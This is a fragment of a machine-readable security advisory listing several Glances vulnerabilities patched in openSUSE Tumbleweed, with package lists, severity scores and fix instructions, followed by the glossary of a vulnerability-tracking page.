}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32609"
},
{
"cve": "CVE-2026-32610",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32610"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=[\"*\"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette\u0027s `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32610",
"url": "https://www.suse.com/security/cve/CVE-2026-32610"
},
{
"category": "external",
"summary": "SUSE Bug 1259841 for CVE-2026-32610",
"url": "https://bugzilla.suse.com/1259841"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32610"
},
{
"cve": "CVE-2026-32611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The GHSA-x46r fix (commit 39161f0) addressed SQL injection in the TimescaleDB export module by converting all SQL operations to use parameterized queries and `psycopg.sql` composable objects. However, the DuckDB export module (`glances/exports/glances_duckdb/__init__.py`) was not included in this fix and contains the same class of vulnerability: table names and column names derived from monitoring statistics are directly interpolated into SQL statements via f-strings. While DuckDB INSERT values already use parameterized queries (`?` placeholders), the DDL construction and table name references do not escape or parameterize identifier names. Version 4.5.3 provides a more complete fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32611",
"url": "https://www.suse.com/security/cve/CVE-2026-32611"
},
{
"category": "external",
"summary": "SUSE Bug 1259840 for CVE-2026-32611",
"url": "https://bugzilla.suse.com/1259840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2026-32611"
},
{
"cve": "CVE-2026-32632",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32632"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32632",
"url": "https://www.suse.com/security/cve/CVE-2026-32632"
},
{
"category": "external",
"summary": "SUSE Bug 1259839 for CVE-2026-32632",
"url": "https://bugzilla.suse.com/1259839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-32632"
},
{
"cve": "CVE-2026-32633",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32633"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32633",
"url": "https://www.suse.com/security/cve/CVE-2026-32633"
},
{
"category": "external",
"summary": "SUSE Bug 1259838 for CVE-2026-32633",
"url": "https://bugzilla.suse.com/1259838"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2026-32633"
},
{
"cve": "CVE-2026-32634",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32634"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, Glances stores both the Zeroconf-advertised server name and the discovered IP address for dynamic servers, but later builds connection URIs from the untrusted advertised name instead of the discovered IP. When a dynamic server reports itself as protected, Glances also uses that same untrusted name as the lookup key for saved passwords and the global `[passwords] default` credential. An attacker on the same local network can advertise a fake Glances service over Zeroconf and cause the browser to automatically send a reusable Glances authentication secret to an attacker-controlled host. This affects the background polling path and the REST/WebUI click-through path in Central Browser mode. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32634",
"url": "https://www.suse.com/security/cve/CVE-2026-32634"
},
{
"category": "external",
"summary": "SUSE Bug 1259837 for CVE-2026-32634",
"url": "https://bugzilla.suse.com/1259837"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32634"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…